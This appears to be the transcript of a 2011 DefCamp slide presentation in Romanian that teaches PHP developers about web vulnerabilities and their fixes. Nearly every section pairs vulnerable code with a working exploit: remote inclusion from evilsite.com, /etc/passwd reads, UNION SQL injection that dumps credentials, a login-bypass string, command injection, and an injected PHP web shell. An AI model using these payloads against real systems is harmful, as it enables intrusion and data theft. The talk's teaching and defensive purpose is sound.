Analiza si evolutia vulnerabilitatilor web

Analiza și evoluția vulnerabilităților web
The analysis and evolution of web vulnerabilities
Popescu Petre Alexandru
@DEFCAMP
sirgod

Introducere
Vulnerabilitățile web au apărut odată cu apariția paginilor PHP. Încet-încet, odată cu evoluția PHP-ului, și vulnerabilitățile au evoluat. Au devenit din ce în ce mai multe și mai complexe. Industria securității s-a dezvoltat și ea astfel încât, în prezent, există numeroase oportunități de angajare pentru cei pasionați de acest aspect al securității IT.
Prezentarea are scopul de a informa dezvoltatorii web de greșelile de programare pe care le pot face, erori care pot avea consecințe catastrofale în cazul unor companii mari.
Prezentarea este bazată pe un vechi tutorial de al meu. Informații noi au fost adăugate, unele lucruri au fost modificate. Unele informații (exemple, cod etc) sunt preluate din scriptul PHP furnizat participanților la concursul WFC 02 (din soluția trimisă de mine).
Analiza unei vulnerabilități web este împărțită în câteva secții:
- exemplu de bază
- unul sau mai multe exemple reale
- una sau mai multe metode de protejare/evitare
- evoluția (istorie)
- informații adiționale

Necesare
PHP, MySQL, Apache, phpMyAdmin (sau XAMMP, WAMP etc.)
Text Editor (e.g. Notepad++)
custom php.ini
Cunoștințe PHP, HTML, MySQL, JavaScript
Răbdare și voință

php.ini
safe_mode = off
disabled_functions= N/A
register_globals= on
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
short_tag_open = on
asp tags = on
file_uploads = on
display_errors= on

RFI – Remote File Inclusion
permiteincluderea de fișiere externe
are nevoie de condiții speciale în php.ini
allow_url_fopen
allow_url_include
vulnerabilitate cu grad de risc extrem de ridicat
funcții în PHP care permit includerea fișierelor
include
include_once
require
require_once
bypass
https, ftp etc.
%00 - NULLBYTE

Exemple de bază:
$pagina=$_GET['pagina'];
include$pagina;
http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
include$pagina.‘.php';
http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00

Exemple reale
if(isset($_REQUEST["main_content"])){
$main_content=$_REQUEST["main_content"];
}elseif(isset($_SESSION["main_content"])){
$main_content=$_SESSION["main_content"];
}
ob_start();
require_once($main_content);
http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt

Fixare
eliminarecaractere speciale nepermise : /
switch()
expresii regulate (validarealfanumerică)
Evoluție/Istorie
Vulnerabilitățile de tip Remote File Inclusion devin tot mai rare. Dacă prin anii 2004-2005 (milw0rm) se făcuseră publice o mulțime de asemenea vulnerabilități, acum de abia dacă mai zărim una, două. În scripturile moderne și populare este foarte improbabil să existe astfel de vulnerabilități. După părerea mea, RFI este una dintre vulnerabilitățile pe cale de dispariție și nu numai din cauza codului PHP scris din ce în ce mai bine, ci și din cauza configurației serverelor (php.ini). În zilele acestea, deși o vulnerabilitate pe cale de dispariție, există softuri care “caută pe Google” siteuri al căror URL corespunde cu anumite “dorkuri”.

LFI – Local File Inclusion
permiteincluderea de fișiere locale
vulnerabilitate cu grad de riscridicat
funcții în PHP care permit includerea fișierelor
include
include_once
require
require_once
bypass
..%5C (Windows)
.. (Windows)
%00 - NULLBYTE

Exemplu de bază
include'/pages/'.$pagina;
http://127.0.0.1/test.php?pagina=../../../../../etc/passwd
http://127.0.0.1/test.php?pagina=........boot.ini
include'/pages/'.$pagina. ‘.php';
http://127.0.0.1/test.php?pagina=../../../../../etc/passwd%00
http://127.0.0.1/test.php?pagina=........boot.ini%00

Exemplu real
if(empty($_GET["url"]))
$url='step_welcome.php';
else
$url=$_GET["url"];
<p><?include('step/'.$url)?></p>
http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd

Fixare
eliminarecaractere speciale nepermise : / .
switch()
expresii regulate (validarealfanumerică)
Evoluție/Istorie
Vulnerabilitățile de tip Local File Inclusion suntmai rareîn zilele acestea. LFI este o vulnerabilitate mai greu de exploatat decât o vulnerabilitate de tip RFI. O alternativă a exploatării vulnerabilităților LFI, pe langă Log Injection , ar fi injectarea de cod PHP în proc/self/environ. Exploatarea ei a evoluat totuși, acum existând softuri care facfuzzing și o exploatează automat.

LFD – Local File Disclosure/Download
permitedescărcarea/vizualizareafișierelor locale
vulnerabilitate cu grad de riscmediu spre ridicat
funcții în PHP care permit citirea fișierelor
file_get_contents
readfile
file
fopen
highlight_file
show_source
bypass
..%5C (Windows)
.. (Windows)
%00 - NULLBYTE

Exemplu de bază
readfile($pagina);
http://127.0.0.1/test.php?pagina=../../../../../etc/passwd
http://127.0.0.1/test.php?pagina=../config.inc.php

Exemplu real
$file=$_SERVER["DOCUMENT_ROOT"].$_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header("Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();
http://127.0.0.1/download.php?file=../../../../../../etc/passwd

Fixare
eliminarecaractere speciale nepermise : / .
expresii regulate
restricționare folder (open_basedir)
Evoluție/Istorie
Vulnerabilitățile de tip Local File Disclosure/Download suntmai rareîn zilele acestea. LFD este o vulnerabilitate asemănatoare LFI-ului, diferența dintre ele fiind că prin LFI se include codul PHP (se execută) iar prin LFD doar se citește. Nu este o vulnerabilitate atât de răspândită și cunoscută precum LFI/RFI, dar există. Probabil o să mai fie prin preajmă ceva timp, mai ales in siteurile mici, medii de file sharing/downloading.

SQL Injection
permiteexecutarea de comenzi SQL asupra bazei de date prin requesturi alterate
SQL Injection poate fi realizat pe mai multe tipuri de baze date
MySQL
MSSQL
PostgreSQL
etc.
există mai multe tipuri de injecții
union based
error based
blind
authentication bypass

SQL Injection
Exemplu de bază
$id=$_GET['id'];
$result=mysql_query("SELECT name FROM members WHERE id = '$id'");
http://127.0.0.1/test.php?id=1+union+all+select+1,2,concat_ws(0x3a, user, pass),4--
http://127.0.0.1/test.php?id=1+union+all+select+1,2,load_file('etc/passwd'),4--
http://127.0.0.1/test.php?id=1+union+all+select+1,2,load_file(0x6574632f706173737764),4--

SQL Injection
Exemplu real
$id=$_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query="SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";
$result=mysql_query($query);
if(mysql_num_rows($result)){
$r=mysql_fetch_array($result);
http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--

SQL Injection
Exemplu real: Login Bypass
$postbruger=$_POST['username'];
$postpass= md5($_POST['password']);
$resultat=mysql_query("SELECT * FROM ".$tablestart."login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
ordie("<p>".mysql_error()."</p>n");
Post Data (sent)
username: admin ' or' 1=1
password: sirgod
$resultat=mysql_query("SELECT * FROM ".$tablestart."login WHERE brugernavn = 'admin ' or ' 1=1 ' AND password = 'sirgod'");

SQL Injection
Fixare
int, is_numeric pentru variabile numerice
expresii regulate (validare alfanumerică)
mysql_real_escape_string
filtrare caractere speciale ; - , . ( ) * / ‘ “
Evoluție/Istorie
Vulnerabilitățile de tip SQL Injection sunt foarte răspândite. În ultimul timp a avut loc o “explozie” a injectatului cod SQL în variabile. O vulnerabilitate periculoasă si cunoscută multor oameni din “underground” sau nu. De-a lungultimpuluimetodele de exploatare s-au diversificat, metode de bypass a protecțiilor (WAF, mod_security) au apărut. În zilele astea, accesul la baza de date nu este ceva extraordinar, s-a ajuns de mult la lucrul cu fișiere (load_file into outfile) și executarea de comenzi asupra sistemului de operare.

Insecure Cookie Handling
ne permite să trecem peste faza de logare
mărire privilegii (dacă sunt stocate în cookie)
modificare variabile
direct din cookie (cookie editor)
din URL Bar (JavaScript)

Exemplu de bază
if($_POST['password']==$thepass){
setcookie("is_user_logged","1");
}else{die("Login failed!");}
if($_COOKIE['is_user_logged']=="1")
{include"admin.php";else{die('not logged');}
javascript:document.cookie = "is_user_logged=1; path=/";

Exemplu real
if($_COOKIE[PHPMYBCAdmin]==''){
if(!$_POST[login]=='login'){
die("Please Login:<BR><form method=post><input type=password
name=password><input type=hidden value=login name=login><input
type=submit></form>");
}elseif($_POST[password]==$bcadminpass){
setcookie("PHPMYBCAdmin","LOGGEDIN", time()+60*60);
header("Location: admin.php");}else{die("Incorrect");}
}
javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie = "1246371700; path=/";

Fixare
folosire sesiuni
Evoluție/Istorie
Insecure Cookie Handling este o vulnerabilitate veche, nu o mai întalnim în zilele acestea decât în scripturi obscure și nefolosite. O întâlnim la scripturi vechi, cel mai probabil scripturi scrise înainte ca $_SESSION să apară (înainte de PHP 4.1.0).

Remote Command Execution
ne permite să executăm comenzi asupra serverului (permisiuni www/apache)
funcții în PHP care ne permit executare de comenzi
exec
passthru
shell_exec
system
vulnerabilitate cu grad de risc foarteridicat
exec() nu arată outputul comenzii, dar ea este executată
comenzi multiple/bypass (operatorul && și ||)

Exemplu de bază
$cmd=$_GET['cmd'];
system($cmd);
http://127.0.0.1/test.php?cmd=whoami
http://127.0.0.1/test.php?cmd=junk||dir

Exemplu real
$status=$_GET['status'];
$ns=$_GET['ns'];
$host=$_GET['host'];
$query_type=$_GET['query_type'];// ANY, MX, A , etc.
$ip=$_SERVER['REMOTE_ADDR'];
$self=$_SERVER['PHP_SELF'];
$host= trim($host);
$host=strtolower($host);
echo("<span class="plainBlue"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>");
echo'<pre>';
system ("dig @$ns $host $query_type");
http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging
Comandă executată: dig ||whoami|| sirgod.net NS

Exemplu real: Complex
$user=$_POST['user'];
$pass1=$_POST['pass1'];
$pass2=$_POST['pass2'];
$email1=$_POST['email1'];
$email2=$_POST['email2'];
$location=$_POST['location'];
$url=$_POST['url'];
$filename="./sites/".$user.".php";
$html="<?php
$regdate = "$date";
$user = "$user";
$pass = "$pass1";
$email = "$email1";
$location = "$location";
$url = "$url";
?>";
$fp=fopen($filename,'a+');
fputs($fp,$html)ordie("Could not open file!");

Codul din fișierul creat
$regdate="13 June 2009, 4:16 PM";
$user="pwned";
$pass="pwned";
$email="pwned@yahoo.com";
$location= “CODUL NOSTRU";
$url="http://google.ro";
Cod injectat
";?><?php system($_GET['cmd']);?><?php $xxx=":D

Codul din fișierul creat după executarea injecției
$regdate="13 June 2009, 4:16 PM";
$user="pwned";
$pass="pwned";
$email="pwned@yahoo.com";
$location="";?><?php system($_GET['cmd']);?><?php$xxx=":D";
$url="http://google.ro";
http://127.0.0.1/sites/ourusername.php?cmd=whoami

Fixare
folosire funcții precum
escapeshellarg (escapează orice caracter care poate fi folosit pentru a executa cod arbitrar)
Evoluție/Istorie
Remote Command Execution este o vulnerabilitate foarte periculoasă, dar nu mai este atât de răspândită ca acum câțiva ani. De obicei prezentă in scripturi de WHOIS, precum cel din exemplul anterior. O putem numi “vulnerabilitateasupremă”, deoarecetoatecelelaltevulnerabilități sunt exploatate ca să se ajungă la execuție de cod arbitrar, pe când aceasta ne oferă execuție de cod în mod direct.

Remote Code Execution
ne permite să executăm cod PHP
funcții în PHP care ne permit executare de cod
eval
vulnerabilitate cu grad de risc foarteridicat
trebuie folosit cod PHP valid (inclusiv ;)

Exemplu de bază
$code=$_GET['code'];
eval($code);
http://127.0.0.1/test.php?code=phpinfo();
http://127.0.0.1/test.php?code=system(whoami);

Exemplu real
$conf=array_merge($conf,$confweb);
}
@eval(stripslashes($_REQUEST['anticode']));
if($_SERVER['HTTP_CLIENT_IP'])
http://127.0.0.1/test.php?anticode=phpinfo();
http://127.0.0.1/test.php?anticode=system(whoami);

Fixare
nepermiterea caracterelor speciale, în special a caracterului ;
găsire alternative
Evoluție/Istorie
Remote Code Execution nu este o vulnerabilitate foarte răspândită, nici nu a fost vreodată. Peste foarte puține cazuri am dat, eval fiind o funcție nu prea folosită de programatori.

Cross-Site Scripting
ne permite să executăm cod JavaScript
funcții în PHP care afișează variabile
print
echo
die
exit
vulnerabilitate cu grad de risc mediu
metode de exploatare
cookie stealing
XSS worm
o mulțime de metode de bypass

Exemple de bază
$name=$_GET['name'];
print$name;
http://127.0.0.1/test.php?name=<script>alert("XSS")</script>
$name=addslashes($_GET['name']);
print'<table name="'.$name.'"></table>';
http://127.0.0.1/test.php?name="><script>alert(String.fromCharCode(88,83,83))</script>

Exemplu real
if(isset($name)){
}else{
die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
http://127.0.0.1/test.php?name=<script>alert("XSS")</script>

Fixare
eliminarea caracterelor speciale din stringuri
folosirea unor funcții PHP
htmlentities (cu sau fără ENT_QUOTES)
htmlspecialchars (cu sau fără ENT_QUOTES)
Evoluție/Istorie
Cross-Site Scripting este o vulnerabilitate extrem de cunoscută, chiar cea mai cunoscută. Deși considerată de mulți inofensivă, nu este. În zilele de azi avem viermi XSS sau putem folosi XSS pentru a trece de protecții anti-CSRF. Avem DOM XSS. Vulnerabilitate foarte des întâlnită, atat cât și în anii trecuți cât și în prezent. Viitorul îl are asigurat, datorită vectorilor ciudați născociți în fiecare zi, vectori care par să treacă peste multe filtre puse de programatori.

Authentication Bypass
ne permite să trecem peste sistemele de autentificare
este de mai multe feluri
variabilă de login
control panel neprotejat
insecure cookie handling (prezentat anterior)
login bypass (SQL Injection) (prezentat anterior)

Exemplu de bază (variabilă de login)
if($logged==true){
echo'Logged in.';}
else{
print'Not logged in.';
}
http://127.0.0.1/test/php?logged=1 *
Exemplu debază (și real) (admin CP neprotejat)
http://127.0.0.1/admin/files.php
* Aici este nevoie ca register_globals din php.ini să fie ON

Exemplu real
if($login_ok)
{
$_SESSION['loggato']=true;
echo"<p>$txt_pass_ok</p>";
echo"<div align='center'><a href='index.php'>$txt_view_entry</a> |
<a href='admin.php'>$txt_delete-$txt_edit</a> | <a href='install.php'>$txt_install
</a></div>";
}
http://127.0.0.1/login.php?login_ok=1

Fixare
Variabilă de login
sistem de autentificare REAL
Admin CP neprotejat
.htaccess
.htpasswd
sistem de autentificare
Evoluție/Istorie
Foarte rare cazurile în care am dat peste așa ceva, dar au fost câteva. Scripturi mai vechi sau mai obscure, în orice caz. Nu ca ar fi fost vreodată foarte răspândite, dar în momentul de față nu se “găsesc”. Plus că “variabila de login” arfi “moartă” acum, deoarece are nevoie de register_globals (începând cu PHP 4.2.0 a fost setată implicit pe OFF, iar începând cu PHP 5.3.0 a fost dezaprobată).

Insecure Permissions
acces la fișiere private (users/passwords, no SQL)
acces la baza de date (backup)
acces la codul sursă (.inc)

Exemple de bază
1) Fișiere administrative neprotejate (FICTIV)
admin/db_lookup.php
// Look up in the databasereadfile('protected/usersdb.txt');
http://127.0.0.1/admin/db_lookup.php
2) Citire users/passwords (REAL)
http://127.0.0.1/userpwd.txt
3) Fișiere INC
http://127.0.0.1/inc/mysql.inc

Exemplu real
4) Descărcare backup
functionmysqlbackup($host,$dbname,$uid,$pwd,$structure_only,$crlf){
$con=@mysql_connect("localhost",$uid,$pwd)ordie("Could not connect");
$db=@mysql_select_db($dbname,$con)ordie("Could not select db");
mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);
http://127.0.0.1/adminpanel/phpmydump.php

Fixare
Fișiere administrative neprotejate
.htaccess, .htpasswd, autentificare
Citire users/passwords
criptare useri/parole într-un fișier obscur, protejat
folosire bază de date
Fisiere INC
.htaccess, .htpasswd, autentificare, salvare ca PHP
Download backup
cerere logare pentru fișierul administrativ de backup
Evoluție/Istorie
Vulnerabilități nu prea răspândite, există doar în scripturi vechi, obscure sau scrise de începători.

Cross-Site Request Forgery
ne permite executarea de requesturi de la distanță
requesturi simple (variabile GET, POST)
requesturi complexe (formulare)
requesturi cu fișiere
vulnerabilitate cu grad de risc mediu/ridicat
metode de a trece de tokenuri
via XSS
predictible token

Exemplu de bază
check_auth();
if(isset($_GET['news']))
{ unlink('files/news'.$news.'.txt');}
else{
die('File not deleted');}
http://127.0.0.1/test.php?news=1

Exemplu real
includes/pages/admin.php
if($_GET['act']==''){
include"includes/pages/admin/home.php";
}else{
include"includes/pages/admin/".$_GET['act'].".php";
* Dacă valoarea variabilei act este members, fișierul includes/pages/admin/members.php va fi
inclus.
includes/pages/admin/members.php
if($_GET['func']=='delete'){
$del_id=$_GET['id'];
$query2121="select ROLE from {$db_prefix}members WHERE ID='$del_id'";
$result2121=mysql_query($query2121)ordie("delete.php - Error in query: $query2121");
while($results2121=mysql_fetch_array($result2121)){
$their_role=$results2121['ROLE'];
}
if($their_role!='1'){
mysql_query("DELETE FROM {$db_prefix}members WHERE id='$del_id'")ordie(mysql_error
());
* Dacă valoarea variabilei func este delete, scriptul execută query-ul de mai sus.
http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4

Fixare
folosire token random
folosire CAPTCHA
cerere parolă pentru a trimite formularul
Evoluție/Istorie
Vulnerabilitate nu foarte “veche”, dartotuși cu ceva ani buni la activ. Foarte răspândită și foarte periculoasă în anumite cazuri. Mai greu de exploatat pentru scripturi custom made, deoarece formularele administrative nu sunt vizibile. Va avea un viitor, deja s-au găsit metode de a trece de protecțiile cu token și de sistemele CAPTCHA.

Path Disclosure
ne oferă informații folositoare în anumite cazuri
poate fi realizat în mai multe moduri
este o vulnerabilitate cu grad de risc scăzut
este folositoare pentru LFI sau SQL Injection (load_file)

Path Disclosure
Exemple de bază
1) Eroaregenerată de funcție
$message=htmlentities($_GET['page']);
echo$message;
http://127.0.0.1/test.php?page[]=Cool
Warning: htmlentities() expects parameter 1 to be string, array given in C:wampwwwtest.php on line 3
2) Eroare generată de incluziune eșuată
// we are already in the file directory
include'file/file.inc';
http://127.0.0.1/theabovefile.php
Warning: include(file/file.inc) [function.include]: failed to open stream: No such file or directory in C:wampwwwfilefile.php on line 4
Warning: include() [function.include]: Failed opening 'file/file.inc' for inclusion (include_path='.;C:phppear') in C:wampwwwfilefile.php on line 4

Path Disclosure
3) Eroare generată de nullificarea sesiunii (PHPSESSID)
session_start();
if(!empty($_GET['newpass'])){
$_SESSION['secret']=$newpass;
}else{
echo'Not defined';
}
session_destroy();
javascript:document.cookie="PHPSESSID=";
Warning: session_start() [function.session-start]: The session id is too long or contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in C:wampwwwtest.php on line 3

Path Disclosure
Fixare
setare display_errors din php.ini OFF
folosirea silent (@) la incluziune
includerea fișierelor ca un om normal
Evoluție/Istorie
Vulnerabilitate nu foarte cunoscută și nu foarte căutată, deoarece nu oferă foarte multe informații de una singură. Foarte folositoare când path-ul către fișier devine important pentru a evita alte zeci de requesturi.

Vulnerabilități CAPTCHA
trecerea de CAPTCHA ne permite automatizarea unor requesturi
grad de risc variabil
CAPTCHA vulnerabile
salvare cod in COOKIE
dimensiuni ale imaginii generate manipulabile (DoS)
folosirea unui cod salvat TEXT în pagină
OCR (nu este prezent în prezentare)

Exemplu (WFC) – Salvare în COOKIE
functioncaptcha($limit1,$w,$h)
{
$v1= rand(1,$limit1);
$scaptcha=$v1/(strlen($v1)*1000);
$img=imagecreate($w,$h);
$white=imagecolorallocate($img,255,255,255);
$black=imagecolorallocate($img,0,0,0);
$grey=imagecolorallocate($img,205,204,205);
imagefill($img,0,0,$black);
imagestring($img, rand(1,10), rand(1,35), rand(5,10),$scaptcha,$white);
imagerectangle ($img,0,0,$w-1,$h-1,$grey);
imageline ($img,0,$h/2,$w,$h/2,$grey);
imageline ($img,$w/2,0,$w/2,$h,$grey);
setcookie('cvalue',$scaptcha,time()+7200);
header("Content-Type: image/jpeg");
imagejpeg($img);
}
Codul poate fi preluat din COOKIE și folosit pentru a trece de sistem

Exemplu real (CaptchaSecurityImages.php) – DoS
$width=isset($_GET['width'])?$_GET['width']:'120';
$height=isset($_GET['height'])?$_GET['height']:'40';
$characters=isset($_GET['characters'])&&$_GET['characters']>1?$_GET['characters']:'6';
http://127.0.0.1/CaptchaSecurityImages.php?width=3000&height=3000&characters=6

Exemplu - Afișare cod în pagină
<?php
session_start();
if(isset($_POST['submit']))
{
if($_POST['cod']==$_SESSION['captcha'])
{
print'Succes';
$_SESSION['captcha']= rand(1000,10000);
}
elseprint'Mai incearca';
}
?>
<formmethod="post">
Cod:
<?php
if(isset($_SESSION['captcha']))print$_SESSION['captcha'];
else
{
$_SESSION['captcha']= rand(1000,10000);
print$_SESSION['captcha'];
}
?>
<inputtype="text"name="cod"value=""/>
<inputtype="submit"name="submit"value="Click"/>
</form>
Codul poate fi citit din sursa paginii

Fixare
Salvare in COOKIE
salvare cod CAPTCHA în sesiuni
DoS
valori fixe sau limitate pentru înalțimea și lățimea imaginii generate
Afișare cod în pagină
afișare cod pe imagine
Evoluție/Istorie
Vulnerabilitate sistemelor CAPTCHA nu sunt foarte răspândite (deși CaptchaSecurityImages era foarte popular) deoarece majoritatea utilizatorilor folosesc soluții precum reCaptcha sau creații proprii bune.

Improper methods
login bruteforce
password reset
insecure “not-so-random” passwords
vulnerabilități cu grad de risc mediu

Improper methods
Exemplu WFC - Login bruteforce
if(isset($_POST)&&sizeof($_POST)==2)
{
$user=$_POST['username'];
$passwd=$_POST['password'];
$state=$users->doLogin($user,$passwd,true);
switch($state)
{
case1:echo'<META HTTP-EQUIV=Refresh CONTENT="0; URL=?page=home">';break;
case-1:echo'Invalid password.';break;
case-2:echo'Invalid username.';break;
case-3:echo'User logged.';break;
}
echo'<br />';
}
?>
}
Login bruteforce (nu e CAPTCHA, nici număr limitat de încercări)

Improper methods
Exemplu WFC – Password Reset
$db->query("SELECT * FROM `users` WHERE username_clean = '".$_POST['username']."' LIMIT 1");
if($db->getNumRows()==1)
{
$npasswd= md5(rand(1,99999));
$row=$db->fetch_array();
if(stripos($_POST['email'],$row['email'])!==FALSE)
{
$db->query("UPDATE `users` set password='".$npasswd."' WHERE username_clean =
'".mysql_real_escape_string($_POST['username'])."' LIMIT 1");
echo'Successfully reseted. You received an e-mail with your new password.';
Requesturi automate, parolă resetată continuu

Improper methods
Exemplu WFC – insecure “not-so-random” passwords
$npasswd= md5(rand(1,99999));
$row=$db->fetch_array();
if(stripos($_POST['email'],$row['email'])!==FALSE)
{
$db->query("UPDATE `users` set password='".$npasswd."' WHERE username_clean = '".mysql_real_escape_string($_POST['username'])."' LIMIT 1");
echo'Successfully reseted. You received an e-mail with your new password.';
Număr relativ mic de parole posibile, bruteforce login după resetare

Improper Methods
Fixare
Login Bruteforce
CAPTCHA, număr limitat de logări eșuate permise
Password reset
CAPTCHA, activare parolă nouă pe email, resetare imposibilă pana la activarea noii parole
Insecure not-so-random password
folosirea unor algoritmi mai complecși de generare a parolei
Evoluție/Istorie
Aceste vulnerabilități se găsesc în scripturi, desigur, nu toate la un loc. Riscul pe care îl prezintă variază în funcție de rezultatele obținute de atacator.

THE END
Mulțumiri sponsorilor:
Club Vila Bran
CreActivity
sirgod@DEFCAMP

http://defcamp.ro	670
http://sirgod.tumblr.com	172
http://defcamp.com	5

Analiza si evolutia vulnerabilitatilor web

by DefCamp Romania on Oct 05, 2011

Accessibility

Categories

Upload Details

Usage Rights

3 Embeds 847

Statistics

Analiza si evolutia vulnerabilitatilor web — Presentation Transcript